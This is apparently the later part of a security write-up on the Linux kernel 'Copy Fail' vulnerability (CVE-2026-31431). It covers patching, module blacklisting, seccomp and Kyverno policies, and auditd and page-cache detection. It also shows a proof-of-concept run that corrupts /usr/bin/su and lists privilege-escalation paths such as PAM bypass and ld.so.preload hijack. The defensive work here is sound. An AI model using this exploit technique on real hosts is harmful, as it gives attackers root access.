sudo dnf update kernel && reboot
# Fedora:
sudo dnf upgrade --refresh && reboot
CISA KEV
The vulnerability was added to the CISA Known Exploited Vulnerabilities catalog on 2026-05-01, with remediation due on 2026-05-15.
7.2 Temporary Mitigation: Disable the Vulnerable Module
If the kernel cannot be upgraded immediately, disable algif_aead as a temporary mitigation. The correct method depends on whether the distribution builds it as a loadable module or built-in code:
| Build type | Representative distributions | How to identify | Mitigation |
|---|---|---|---|
Loadable module (=m) |
Ubuntu, Debian, Alpine, Arch, SUSE | modinfo algif_aead returns output |
modprobe blacklist or rmmod |
Built-in (=y) |
RHEL, CentOS, Oracle Linux, Fedora, Amazon Linux | modinfo algif_aead fails |
initcall_blacklist kernel parameter |
Distributions with a loadable module: Ubuntu, Debian, Alpine, Arch, and SUSE:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif_aead.conf
sudo rmmod algif_aead 2>/dev/null || sudo reboot
Ubuntu's kmod security update creates this file automatically.
Distributions with built-in code: RHEL, CentOS, Oracle Linux, Fedora, and Amazon Linux.
For built-in code, rmmod and /etc/modprobe.d/ blacklist files are ineffective:
grep CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
# CONFIG_CRYPTO_USER_API_AEAD=y <- built in, not a module
rmmod algif_aead 2>&1
# rmmod: ERROR: Module algif_aead is builtin.
Use the initcall_blacklist kernel boot parameter:
# Disable algif_aead initialization.
grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
reboot
# More aggressive: disable the whole AF_ALG interface.
grubby --update-kernel=ALL --args="initcall_blacklist=af_alg_init"
reboot
Validate mitigation on all distributions:
python3 -c "import socket; socket.socket(38,5,0)" 2>&1
# Expected: OSError: [Errno 97] Address family not supported by protocol
# or: OSError: [Errno 93] Protocol not supported
Notes
- These mitigations may affect applications that use kernel-accelerated crypto, such as OpenSSL's
afalgengine or IPsecxfrm. Most applications fall back to user-space crypto automatically, so practical impact is usually small.- KernelCare users can apply the live patch with
kcarectl --updatewithout reboot. Verify withkcarectl --patch-info | grep -i "copy.fail\|algif_aead\|CVE-2026-31431".
7.3 Container Mitigation
If the host kernel has been upgraded to a fixed version (Section 7.1) or the vulnerable module has been disabled (Section 7.2), the vulnerability is eliminated at the root. The container-layer controls below are not strictly required in that case. As defense in depth, however, it is still recommended to block AF_ALG socket creation in containers. The interface has very few legitimate container use cases, and blocking it reduces the attack surface for future bugs in the kernel crypto subsystem as well.
Default security mechanisms do not block it
Older Docker versions before 29.4.2, Kubernetes
RuntimeDefault, and the SELinux targeted policy all allowsocket(AF_ALG)andsplice(). They do not prevent exploitation.
Upgrade the Docker Runtime
Docker 29.4.2 and later updated the default container policy to block AF_ALG socket creation. For Docker users, upgrading is the simplest defense and requires no extra configuration:
docker --version
# Docker version 29.4.3 or later means the defense is built in.
# Validate.
docker run --rm python:3.11-slim python3 -c "
import socket
try:
socket.socket(38, 5, 0)
print('[!] FAIL - AF_ALG not blocked')
except OSError as e:
print(f'[+] AF_ALG blocked: {e}')"
Docker 29.4.2 regression
Docker 29.4.2 tried to block AF_ALG by denying
socketcall(2)through seccomp, but that broke 32-bit programs and i386 images such as SteamCMD and Wine. Docker 29.4.3, released on 2026-05-06, fixed the regression by moving enforcement to Docker's own AppArmor/SELinux container profile at the LSM layer. This does not break 32-bit programs. Upgrade directly to 29.4.3 or later.The SELinux rule here is a Docker-provided deny rule for
alg_socketin the container profile. It is not the same as the system default SELinux targeted policy, which does not understand AF_ALG and does not mitigate this issue by itself. On RHEL/CentOS systems, Docker needs"selinux-enabled": trueindaemon.jsonfor the SELinux rule to apply. If SELinux is not enabled, Docker falls back to AppArmor rules on distributions such as Ubuntu and Debian.
Kubernetes is not protected by Docker upgrades
Kubernetes
RuntimeDefaultseccomp profiles are managed independently by kubelet. Upgrading Docker does not change seccomp behavior for Kubernetes containers. Use a custom profile as described below.
Deploying a Custom Seccomp Profile
For Kubernetes clusters or Docker environments that cannot be upgraded, deploy a custom seccomp profile manually. The profile only blocks AF_ALG socket creation where family=38; it does not affect normal TCP/UDP networking. AF_ALG has almost no legitimate use inside most containerized applications.
Custom profile block-af-alg.json:
{
"defaultAction": "SCMP_ACT_ALLOW",
"syscalls": [
{
"names": ["socket"],
"action": "SCMP_ACT_ERRNO",
"errnoRet": 1,
"args": [
{ "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
]
}
]
}
Cross-distribution applicability
Seccomp-BPF is a Linux kernel feature that has been stable since 3.17. The profile above applies to any Linux distribution as long as the kernel is at least 3.17 and the container runtime supports seccomp. Docker 1.10 and later, containerd, CRI-O, and Podman all support it.
For non-container environments, such as bare metal or VMs, load an equivalent profile with
libseccompat application startup or use systemd'sSystemCallFilter=directive.
Manual Docker deployment:
docker run --rm --security-opt seccomp=block-af-alg.json \
python:3.11-slim python3 -c "
import socket
try:
socket.socket(38, 5, 0)
print('[!] FAIL')
except PermissionError as e:
print(f'[+] AF_ALG blocked: {e}')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('[+] TCP socket OK')
s.close()"
# [+] AF_ALG blocked: [Errno 1] Operation not permitted
# [+] TCP socket OK
Kubernetes deployment:
Pod Security Standards, including Privileged, Baseline, and Restricted, do not restrict AF_ALG. Deploy the custom profile manually:
cp block-af-alg.json /var/lib/kubelet/seccomp/
# k3s path: /var/lib/rancher/k3s/agent/seccomp/
Reference it from the Pod configuration:
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: block-af-alg.json
Use an admission controller such as Kyverno or OPA/Gatekeeper to enforce the profile for all Pods and avoid omissions:
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: require-seccomp-block-af-alg
spec:
validationFailureAction: Enforce
rules:
- name: check-seccomp
match:
any:
- resources:
kinds: ["Pod"]
validate:
message: "Pod must use block-af-alg seccomp profile (CVE-2026-31431 mitigation)"
pattern:
spec:
securityContext:
seccompProfile:
type: "Localhost"
localhostProfile: "block-af-alg.json"
8. Attack Detection
8.1 Syscall-Level Auditing and Its Limits
The most direct detection idea is to monitor key syscalls in the exploit chain. Auditd can record AF_ALG socket creation:
# Persistent audit rules.
cat > /etc/audit/rules.d/copyfail.rules <<'EOF'
-a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg
-a always,exit -F arch=b64 -S splice -k copyfail_splice
EOF
augenrules --load
In container environments, legitimate AF_ALG usage is rare, so Falco and other eBPF tools can raise real-time alerts on AF_ALG socket creation inside containers. On bare metal or VMs, however, legitimate users such as the OpenSSL afalg engine and dm-crypt can produce continuous noise. Even matching the combination of AF_ALG and splice cannot reliably distinguish legitimate crypto operations from exploitation. Opening an AF_ALG socket and calling splice are legal kernel interfaces.
The core limitation is that syscall-based detection cannot be zero-false-positive. It can only say that someone used AF_ALG; it cannot prove that someone exploited Copy Fail. It also has a coverage problem. As Chapter 5 showed, page-cache overwrite is a recurring vulnerability pattern. AF_ALG-specific detection will miss Dirty Frag's AF_KEY path, and splice detection cannot distinguish legitimate zero-copy I/O. A blacklist of specific syscalls will always lag behind new variants.
A better approach is to detect the result, not the technique. For page-cache-only overwrite bugs such as Dirty Pipe, Copy Fail, and Dirty Frag, tampered page cache must differ from the original disk content. That difference is detectable.
8.2 General Detection: Comparing Page Cache with O_DIRECT
The O_DIRECT flag makes read() bypass the page cache and read directly from the block device. Compare an O_DIRECT read with a normal read(). If the results differ, the page cache has been tampered with:
Normal read: file -> [Page Cache] -> user buffer <- returns tampered data
O_DIRECT: file -> [Disk] -> user buffer <- returns original data
If the two differ, the Page Cache has been modified illegally.
This method has three important advantages:
- Generality. It detects all vulnerabilities that only modify page cache, including Copy Fail, Dirty Pipe, Dirty Frag, and future bugs with the same primitive. It is not tied to any specific attack mechanism. Dirty COW is the exception because it writes modified data back to disk through page writeback;
O_DIRECTsees the modified data too, so traditional file-integrity checks such asrpm -V, AIDE, or Tripwire are needed. - Determinism. For files that are not open for writing by any process, a mismatch between page cache and disk is absolutely abnormal. The Linux kernel's
deny_write_access()mechanism prevents normal simultaneous write-and-execute situations. - Result-based detection. Even if the attacker uses an unknown vulnerability, any page-cache-only tampering produces a detectable mismatch.
I validated O_DIRECT detection on CentOS 8 with XFS for both overlay2 layer files and host SUID files. Using host /usr/bin/su as an example:
# Copy Fail tampers with the ELF header of /usr/bin/su.
python3 poc_marker.py /usr/bin/su
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# O_DIRECT comparison immediately detects the mismatch.
# Page cache [0:16]: deadbeef020101000000000000000000 <- tampered
# O_DIRECT [0:16]: 7f454c46020101000000000000000000 <- original ELF header from disk
# [ALERT] SUID binary TAMPERED! 4 bytes differ at: [0, 1, 2, 3]
Implementation detail: O_DIRECT requires the memory address and read length to be aligned to the filesystem block size, usually 4096 bytes. Use posix_memalign() to allocate an aligned buffer. ext4, XFS, Btrfs, and overlay2 on top of ext4/XFS support O_DIRECT. tmpfs does not, but tmpfs is less likely to be the primary attack target.
8.3 Runtime Interception: fanotify Guard
O_DIRECT comparison answers whether tampering can be detected. The next question is when to check. Periodic full scans are not immediate, but checking every file open is too expensive.
Linux fanotify provides the FAN_OPEN_EXEC_PERM event on kernel 5.0 and later. When execve() is about to execute a file, the kernel sends a permission request to user space. A user-space program can read the file, perform checks, and respond with FAN_ALLOW or FAN_DENY. Combining O_DIRECT comparison with fanotify gives a real-time execution guard:
Design decisions:
- Monitor only SUID/SGID files. At startup, scan target directories and build a set of SUID/SGID files. Executions of non-SUID files are allowed immediately with no overhead.
- Skip root executions. Root already has full privilege and does not need SUID escalation. In a container-escape scenario, the tamperer may be root inside the container, but the victim is usually a normal host user executing a tampered SUID file. The Guard still blocks that case.
- Kernel compatibility.
FAN_OPEN_EXEC_PERMrequires kernel 5.0 or later. RHEL 8 has a backport and was verified. On older kernels, fall back toFAN_OPEN_PERM, intercept all open events, and filter in user space. This is slightly more expensive but functionally equivalent. - No extra write-fd check is needed. If a package manager is updating a SUID file, the kernel itself rejects
execve()withETXTBSYthroughdeny_write_access(). A legitimate update does not create a false positive execution event.
Experiment result on CentOS 8 with kernel 4.18.0:
2026-05-08 06:57:34 INFO Found 21 SUID/SGID files
2026-05-08 06:57:34 INFO Monitoring mount (FAN_OPEN_EXEC_PERM): /usr
2026-05-08 06:57:34 INFO Guard active [ENFORCE] (event_size=24, check_root=False)
# After Copy Fail tampers with /usr/bin/su, a normal user tries to execute it:
2026-05-08 06:57:38 WARNING [ALERT] BLOCKED pid=2677362 uid=1000 /usr/bin/su
(page cache tampered at offset 0)
# User side:
$ /usr/bin/su
bash: /usr/bin/su: Operation not permitted (exit 126)
The Guard successfully blocks the tampered SUID binary at execve() time and prevents privilege escalation.
Detection Coverage
The fanotify Guard uses FAN_OPEN_EXEC_PERM to intercept execve(). By design, it only covers SUID/SGID binary execution. Compared with the host attack paths in Chapter 5:
| Attack path | fanotify Guard | Periodic O_DIRECT scan |
Reason |
|---|---|---|---|
| SUID/SGID binary overwrite | Yes | Yes | Real-time block at execve() |
/etc/passwd UID tampering |
No | Yes | Configuration file read through open() and read() |
| PAM module authentication bypass | No | Yes | Shared library loaded through dlopen() |
| Shared-library live patching | No | Yes | Library mapped through mmap(), not execve() |
/etc/profile command injection |
No | Yes | Login shell reads and sources it |
| Cron script tampering | No | Yes | Executed by crond, but not a SUID file |
ld.so.preload path hijack |
No | Yes | Dynamic linker reads it at process startup |
| Container escape through layer sharing | No | Yes | Scan overlay lower layers periodically |
The fanotify Guard addresses the most urgent path: blocking tampered SUID binaries before they can escalate privileges. The other host paths and the container scenarios require periodic O_DIRECT scanning. Recommended scan priority is: PAM modules and shared libraries under /lib64/security/ and /lib64/*.so; critical configuration files such as /etc/passwd, /etc/profile, and /etc/ld.so.preload; cron scripts and container lower layers. For read-only files in lower layers, a page-cache versus disk mismatch is a certain anomaly with no false positives.
9. Conclusion
Copy Fail is a classic cross-subsystem design-assumption conflict. authencesn assumed the output buffer was safe kernel memory. The algif_aead in-place optimization made the output buffer include page-cache pages. splice introduced file data into that path without copying. Each design decision was reasonable in isolation, but together they created a security bug that remained present for nine years.
At the host level, the attack surface extends far beyond the SUID overwrite demonstrated by the public PoC. The experiments confirmed seven independent privilege-escalation paths: /etc/passwd UID tampering with one four-byte write, PAM authentication bypass that accepts any password for root, shared-library live patching without process restart, /etc/profile command injection, cron script tampering, and ld.so.preload path hijacking. These paths are not specific to Copy Fail; they apply to page-cache overwrite vulnerabilities in general. Shared libraries and PAM modules are especially persistent because mmap references prevent drop_caches from evicting the modified pages.
At the container level, Page Cache is global shared state that crosses isolation boundaries. Cross-container page-cache pollution and read-only volume bypass are real. After deeper validation, however, a generic zero-privilege container escape is architecturally infeasible in a standard Kubernetes environment: containerd and runc do not execute snapshot-layer files in the host context. Additional privileged configuration, such as hostPath or CAP_DAC_READ_SEARCH, is needed to turn page-cache tampering into host escape. Docker's docker export can persist tampered data, and docker diff does not reveal it, which makes the bug valuable in supply-chain scenarios.
From a broader view, Copy Fail is one member of the "splice zero-copy plus kernel in-place writeback" family of page-cache overwrite bugs. Dirty Pipe in 2022, Copy Fail in 2026, and Dirty Frag shortly afterward all show the same primitive in different subsystems. Dirty Frag appeared only eight days after the Copy Fail fix, using the same class of primitive elsewhere. Defense should therefore not focus only on AF_ALG; the next variant may come from any zero-copy path that performs in-place writes.
For that reason, detection should move from detecting the technique to detecting the result. O_DIRECT bypasses page cache and reads directly from disk. Comparing it with normal read() detects page-cache tampering for all page-cache-only bugs, including Copy Fail, Dirty Pipe, Dirty Frag, and future variants. Dirty COW remains an exception because it writes changes back to disk and must be detected by traditional file-integrity systems. For SUID/SGID binaries, combining O_DIRECT comparison with fanotify FAN_OPEN_EXEC_PERM allows real-time blocking at execve(). Other targets, such as PAM modules, shared libraries, and configuration files, should be covered by periodic O_DIRECT scans.
Defense and detection recommendations:
- Upgrade the kernel. This is the root fix.
- Deploy a seccomp profile that blocks AF_ALG in container environments. Docker 29.4.3 and later include this by default.
- Deploy a fanotify plus
O_DIRECTGuard to block tampered SUID/SGID binaries at execution time. - Periodically scan critical files with
O_DIRECT: PAM modules, shared libraries,/etc/passwd,/etc/profile,/etc/ld.so.preload, and container lower layers. - Use Auditd or Falco as baseline telemetry, recording AF_ALG usage as supporting evidence.
The vulnerability details were initially disclosed by Taeyang Lee. This article builds on that disclosure with independent root-cause analysis and experimental validation.
References
Vulnerability Disclosure and Analysis
- Taeyang Lee, Copy Fail: One-shot local privilege escalation via the Linux crypto API — xint.io
- NVD, CVE-2026-31431 — nvd.nist.gov
- Copy Fail official page — copy.fail
- Microsoft Defender, CVE-2026-31431 Copy Fail vulnerability enables Linux root privilege escalation — microsoft.com
- CISA Known Exploited Vulnerabilities Catalog — cisa.gov
Kernel Commits
a5079d084f8b— 2011,authencesnmodule introduction72548b093ee3— 2017, vulnerability introduced throughalgif_aeadin-place optimizationa664bf3d603d— 2026, vulnerability fixed by reverting the in-place behavior
Container Security Responses
- Juliet, We tested Copy Fail in Kubernetes: PSS Restricted + RuntimeDefault do not block AF_ALG — juliet.sh
- Stream Security, CVE-2026-31431: how Copy Fail behaves in Kubernetes — stream.security
- Percivalll, Copy Fail Kubernetes PoC — GitHub
- Docker seccomp fix, block AF_ALG in v29.4.2 — moby/moby issue
- Docker 29.4.3 regression fix using AppArmor/SELinux — release notes
- Sidero Labs / Talos response — siderolabs.com
- vArmor Copy Fail mitigation rules, AppArmor/BPF — GitHub
- iwanhae, copyfail-ebpf-k8s — GitHub
Distribution Security Advisories
- Ubuntu, Fixes available for CVE-2026-31431 (Copy Fail) — ubuntu.com
- Red Hat, RHSB-2026-02 Cryptographic Subsystem Privilege Escalation — access.redhat.com
- Debian Security Tracker, CVE-2026-31431 — security-tracker.debian.org
- SUSE, SUSE responds to the copy.fail vulnerability — suse.com
- Alpine Linux Security Tracker — security.alpinelinux.org
- Oracle Linux CVE Tracker — linux.oracle.com
- AlmaLinux, CVE-2026-31431 Copy Fail — almalinux.org
- Arch Linux Security Tracker — security.archlinux.org
- AWS Security Bulletin, CVE-2026-31431 — aws.amazon.com
- Bottlerocket issue #4821 — GitHub
- Fedora Discussion, Is Copy Fail patched in Fedora 43? — discussion.fedoraproject.org
- CloudLinux / KernelCare, Copy Fail live patches — blog.cloudlinux.com
Security Vendor Analysis
- Palo Alto Unit 42, Copy Fail: What You Need to Know — unit42.paloaltonetworks.com
- Wiz.io, CopyFail: Linux privilege escalation vulnerability — wiz.io
- Sysdig, CVE-2026-31431 Copy Fail: Linux kernel flaw lets local users gain root — sysdig.com
- Kudelski Security — kudelskisecurity.com
- SentinelOne Vulnerability Database — sentinelone.com
- Kodem Security, CVE-2026-31431 Remediation Runbook — kodemsecurity.com
Community Discussion and Reporting
- Hacker News discussion, including mitigation and WSL2 impact — news.ycombinator.com
- CyberKendra, A 732-byte Python script can get root — cyberkendra.com
Related Page-Cache Overwrite Vulnerabilities
- CVE-2016-5195 Dirty COW — dirtycow.ninja
- CVE-2017-1000405 Huge Dirty COW — Bindecy
- CVE-2022-0847 Dirty Pipe — dirtypipe.cm4all.com
- CVE-2026-43284 and CVE-2026-43500 Dirty Frag — dirtyfrag.io, GitHub PoC, oss-security